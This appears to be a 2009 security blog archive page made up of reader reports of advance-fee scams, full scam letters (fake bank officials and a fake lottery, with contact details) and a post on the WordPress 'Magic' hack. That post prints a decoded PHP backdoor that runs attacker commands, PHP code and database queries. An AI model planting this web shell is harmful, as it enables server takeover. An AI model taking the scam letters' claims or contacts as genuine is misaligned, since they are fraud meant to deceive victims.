Archive for August, 2009
please help me what should i do now

i hav sent my scanned passport copy as a pdf file on the following email address (used by a scammer who betray me in the context of money of a late person whose dormant account is present in lloyd bank of UK . sacmmer use the name of J.eric who are the executive of lloyds bank and said that we will use the amount of that late person as beneficiary. scammer email is JericDanielsprivate@msn.com

Try Reporting it to the www.ic3.gov
also here:
U.S. Secret Service
Financial Crimes Division
1800 G Street, NW
Room 942
Washington, DC 20223
Phone: (202) 435–5850
Fax: (202) 435–5031
Or contact the local U.S. Secret Service Field Office.
Overseas

Contact the Foreign Commercial Service (FSC) at the nearest U.S. Embassy or Consulate. If there is no FCS office, contact the American Citizens Services Unit of the Consular Section or the Regional Security Office.

I BELEIVE I AM BEING SCAMMED.

I HAVE A EMAIL FROM “DONATUS KPACHI” OF
NIGERIA. I AM SURE IT IS IT A SCAM.

I HAVE THE FOLLOWING: CENTRAL BANK OF NIGERIA. CK 00450005, ACCT DRAWN ON CBN
90241710, MR. THOMAS R. RHODES THE AMOUNT OF $3,650,000.00. I AM SURE IT IS A SCAM.

JUST WANT TO SHARE MY EXPERIENCE WITH YOU.

THANKS,

THOMAS R. RHODES

Another Ghana Date Scammer “travis eurie”

i meet some one on line now for about 4 months, sayin he is travis eurie, i just found out that he is from ghana and a scamer for women for money so beware of him

e-mail from Alex Mbaki

To whom this may concern,
I recieve this message saying it was from Central Bank O Nigeria office of the governor Lasgos -Nigeria,I even got a telegraphic transfer department payment slip C/O
Tinubu Squqre,Lagos,I sent back the information the ask me fo to see was this true are not and I was told if I did not resopne they would report me to the FBI in Nigeria so what do you make of this give me a return e-mail answer please thank you
Margie

mobile draw

respected sir,
I have recieved a sms in my mobile saying I have won 500,000.00 GB POUNDS.I wanted to know how can i recieve this money.For this I have to fulfill three documents as requested by the bank.For this I need the proof of winning(the certificate of award) and a copy of fund release order.I wish to recieve these as soon as possible.I have contacted Mr.Mark Davies who is the director of operations.His contact number is +44 (871) 2344303,fax number:+44 (700) 5942618
email: bboperationdirector@gmail.com

I qwish to recieve an reply for this.
yours faithfully
Anoop Kumar OK

SRR Findings to IA Controls

From Reader:

I stumbled upon your site and am new to security working for a contractor. I’m attempting to complete a DIACAP POA&M and need to map SRR findings to IA controls – any idea where I might find this information?

The SRR finding reference the DOD Unix STIG and NIPR STIG. It doesn’t seem to completely match up the the DIACAP IA Controls, but that is where a good system security engineer/ IA analyst comes in.

Once you’ve got your SRR results, IA Control compliance and mitigation depends on your situation. There are a few that map directly (like Screen Saver) but most of the SRR findings will fall under one or two of the IA Controls.

Hope this helps.

Thanks for your response *scam*

Thanks For Your Response‏
From: cheung.eric2008@asianbusinessmail.com (cheung.eric2008@asianbusinessmail.com)
You may not know this sender.Mark as safe|Mark as junk
Sent: Mon 7/27/09 12:16 AM
To: rj_murray@hotmail.com

First I wish to thank you for your response. I sincerely appreciate your interest to assist me in this transaction,however I would like to be sure of your willingness, trustworthiness andcommitment to execute this project with me, I cannot afford to compromisethese virtues and none of your personal information will be shared withanybody whatsoever, I have my principles. About me and the funds: Like I said earlier, I am Mr. Cheung Eric Li Ka aDirector of the Hang Seng Bank LTD Hong Kong. My client Col. Ahmad AliMoh’d Hassan, who was with the Iraqi forces and also a Merchant, made afixed deposit with a value of 15.5m USD for 18 months with my bank. Uponmaturity several notices was sent to him but we did not hear from him orany of his relatives. It was later discovered that he and his family werekilled in Iraqi war with NO living witness to this fund. Now what I want todo is to place you as the next of kin to my late client since he had noneand have the funds released to you for the both of us to share in the ratio50% for me and 50% for you. I got hold of your email through the web directories and I had decided tocontact you since I needed a reliable foreigner that can help me pull thefunds out of my bank as I cannot do it myself and I do not want anyonearound me (family, friends and my bank) to be aware that the move is fromme.You should not have anything to worry about, as I want you to know that Ihave had everything planned out so that we shall come out successful. Ihave contacted an attorney that will prepare the necessary document thatwill back you up as the next of kin to Col. Ahmad Ali Mohamed Hassan, andall that is required from you at this stage is for you to provide me withyour Full Names, your Age and Address so that the attorney can commence hisjob. The attorney will prepare the Affidavits which shall legally put youin place as next of kin, he will obtain the necessary clearances which willcover all the aspects involved in this transaction from the Hong Kongauthorities including the Justice department. What I expect from you is trust and commitment, I want this huge sum ofmoney (Fifteen Million Five Hundred Thousand United State Dollars)transferred with your assistance. The fact that you are a foreigner giveyou the priviledge to stand in as my deceased client beneficiary and Iassure you that none of his relatives will ever come for the funds. Whatbothers me most is that according to the laws of my country at theexpiration of 4 years the funds will revert to the ownership of the HongKong Government if nobody applies to claim the funds. Hence, I want us toact fast and get this funds transferred in our favour and as a banker Iknow that if we follow up this transaction diligently it would be completedwithin 10 working days. I want you to assure me that you will follow up this business seriously andas soon as I hear from you with your information, I shall give the Attorneya go-ahead to prepare the documents in your name. I shall be waiting foryour response and assurance in this regard, you need to be someone whom Ican rely upon, at least for absolute commitment. I await your response Eric Cheung ——————————————————————–myhosting.com – Premium Microsoft® Windows® and Linux web and applicationhosting – http://link.myhosting.com/myhosting

Scamletter – Mallam Sanusi Lamido Aminu Sanusi

CENTRAL BANK OF NIGERIA
CORPORATE HEAD QUARTERS
Zaria Street, Garki II, Abuja, Nigeria.

From: The Desk of
Mallam Sanusi Lamido Aminu Sanusi
Executive Governor Central Bank Of Nigeria
Direct Telephone +234 802 037 7660.

Re_ Diplomatic Arrangements Transfer of Twenty Five Million Five Hundred Thousand United States Dollars

I am Mallam Sanusi Lamido Aminu Sanusi Executive Governor Central Bank I write to inform you that the Board of Directors has concluded our final meeting today , with view of finalizing the entire arrangement toward the Diplomatic Transfer of your Contract fund valued at US$25. 5. Million. In view of the outcome of the meeting, we have finally concluded our decision to release your payment by this means. Base on the arrangement, one delegate have been appointed who will accompany the metallic truck Boxes to you in your country Their names will be given to you as soon we receive your responses today.

There intend rout travel with fly British Airline Business Class Flight. On their arrival, the delegates will get in touch with you by calling you on phone in order to conclude the arrangements necessary for the clearance of the Metallic Truck Boxes from the airport. For your information the delegates will leave as soon as we receive your acceptance letter or call me today on +234 802 037 7660. According to the nature of this arrangement, the metallic boxes will be covered with diplomatic immunity, which will protect the metallic truck boxes from any interrogation or security, therefore nobody have authority to tamper with the metallic truck boxes until it reaches the required destination.

Sequel to the Diplomatic arrangement you are hereby advice to make available the Clearance Charge due for the Clearance of the consignment at the Airport and to obtain a United Nation Diplomatic (Yellow Tag) which will be place at the body of the consignment before delivery it to your doorstep to avoid disturbance or searching from any security agency at the airport in your country. We there advice that, you should stick to the instructions of the delegate to foster smooth conclusion of the transaction,

Your can contact the diplomats on the emails address below.

Email: cbndiplomats@gmail.com

Please reconfirm the information under listed to the diplomats on his email address cbndiplomats@gmail.com

YOUR FULL NAME:______________________________________________________
YOUR ADDRESS :________________________________________________________
AIRPORT:______________________________________________________________
DIRECT TELEPHONE NUMBER:_____________________________________________
ANY COPY OF YOUR IDENTIFICATION IN PERSON INTERNATIONAL PASSPORT/DRIVING LINCENSE

NOTE: The above information is required urgently with your direct phone number which will be used to reach you any time.
I am online waiting for your urgent response you can reach me on +234 802 037 7660. for more direction and information’s.

Mr. Sanusi Lamido Aminu Sanusi
Executive Governor Central Bank of Nigeria

where to send scam emails

From Reader:

Been getting lots of scams out of nigeria here in the usa where would i forward all scam letters two? mine have ben on atempts no loses

elamb[dot]security[at]gmail.com
http://www.consumerfraudreporting.org/
spam@uce.gov – Federal Trade Commission

Any scam that come from “@yahoo.com” should be sent to:
phishing@cc.yahoo-inc.com
mail-spoof@cc.yahoo-inc.com

Here is a really good page from consumerfraudreporting.org on reporting scam emails

Server at Magic Requires Username Password

The WordPress “Magic” hack!

If your getting this message: “The server (our server domain, e.g. DOMAIN.COM) at Magic” Then you likely have infected code in your wordpress blog.

Wordpress Magic Attack

Wordpress Magic Attack

WordPress user Yokima reported this very slick hack.

FIX ACTION:
And the fix is to update your blog. This will fix the issue. Make sure you change your password if you actually put your information in that “serve at Magic” message box. Although updating the the wordpress blog definitely fixes the issue, you may have to reload your pluggins too because they may also have some infect code. Doing further research on this matter.

*Similar issues reported by techartistserver BLAH.fuzz.com at Fuzz Access requires a username and password.”

What the infected code looks like after the malware injection into your blog.. yep.. uuugly!

From RocketWood:
We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:

{

if (!function_exists('______safeshell'))

{

function ______safeshell($komut) {

@ini_restore("safe_mode");

@ini_restore("open_basedir");

$disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));

if (!empty ($komut)) {

if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {

//@ ob_start();

@ passthru($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();

}

elseif (function_exists('system') && !in_array('system', $disable_functions)) {

//@ ob_start();

@ system($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();

}

elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {

$res = @ shell_exec($komut);

echo $res;

}

elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {

@ exec($komut, $res);

$res = join("\n", $res);

echo $res, "\n";

}

elseif (@ is_resource($f = @ popen($komut, "r"))) {

//$res = "";

while (!@ feof($f)) {

//$res .= @ fread($f, 1024);

echo(@ fread($f, 1024));

}

@ pclose($f);

}

else

{

$res = {$komut};

echo $res;

}

}

}

};

if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {

echo "\n";

if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {

eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);

}

else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {

______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);

}

else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {

$result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);

if (!$result)

{

echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";

die();

}

else if (is_resource($result))

{

$res = array();

while ($row = mysql_fetch_assoc($result))

{

$res[] = $row;

};

mysql_free_result($result);

echo serialize($res);

die();

}

else

{

echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";

die();

}

};

echo "\n\n";

die();

};

};

p.s: don’t feel too bad, even the security masters get hacked by malicious S.O.B’s.